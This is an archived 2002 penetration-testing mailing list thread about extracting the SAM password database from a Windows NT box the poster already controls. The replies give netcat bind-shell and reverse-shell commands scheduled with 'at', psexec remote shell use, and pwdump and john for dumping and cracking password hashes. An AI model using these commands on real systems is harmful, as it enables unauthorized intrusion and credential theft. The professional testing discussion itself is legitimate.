Penetration Testing mailing list archives
RE: Access to a win NT box
From: "Mark Maher" <Mmaher () ochsner org>
Date: Fri, 28 Jun 2002 08:07:55 -0500
Like Marlon Jabbur noted, use psexec from http://www.sysinternals.com/ntw2k/freeware/pstools.shtml : C:\>psexec \\192.168.1.1 cmd.exe Don't mess around with the scheduler and net time. Psexec makes it much easier. Also, once you have admin, you can use pwdump3 and then john or L0pht to crack the passwords.
"Panos Dimitriou" <p.dimitriou () encode-sec com> 06/26/02 11:23AM >>>
You can always upload any tool you like, such as pwdump, and then you just have to execute it. In order to execute it you can: 1. upload netcat (nc.exe) 2. execute "net time \\target" 3. schedule a job like: at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe and then establish a connection (with netcat preferably) to port 2222 or, if the system is firewalled at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe and have a netcat listening on port 80 (nc -L -p 80)in order to establish a reverse shell. After gaining a shell on the system execute pwdump and download the results. Furthermore, if you use pwdump2 you can extract the passwords even if the SAM is SYSKEY protected. I hope this helped ________________________ Panos Dimitriou Director, Managed Security Services _________________________ ENCODE S.A. 3, R. Melodou str. 151 25 Marousi Athens, Greece _________________________ E Tel.: +30 (1) 6178410 E Fax.: +30 (1) 6109579 s p.dimitriou () encode-sec com " www.encode-sec.com _________________________ -----Original Message----- From: Pedro Miranda [mailto:rpmiranda () sonae pt] Sent: Tuesday, June 25, 2002 7:43 PM To: pen-test () securityfocus com Subject: Access to a win NT box Hi, I've got remote access to a wNT box using the command \\machinename\c$ /user:machinename\administrator So i've got administrator privileges but i want to access to the SAM database. I've tried to get \\winnt\repair\sam._ but i couldn't find the rdisk comand. Can anybody help tell me where can i find this software, or if there is another way to get access to the sam file. Thanks in advance ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Access to a win NT box Pedro Miranda (Jun 26)
- RE: Access to a win NT box Marlon Jabbur (Jun 28)
- RE: Access to a win NT box Panos Dimitriou (Jun 28)
- <Possible follow-ups>
- RE: Access to a win NT box Davis, Matt (Jun 28)
- RE: Access to a win NT box Mark Maher (Jun 28)
- RE: Access to a win NT box Shackleford, Dave (Jun 28)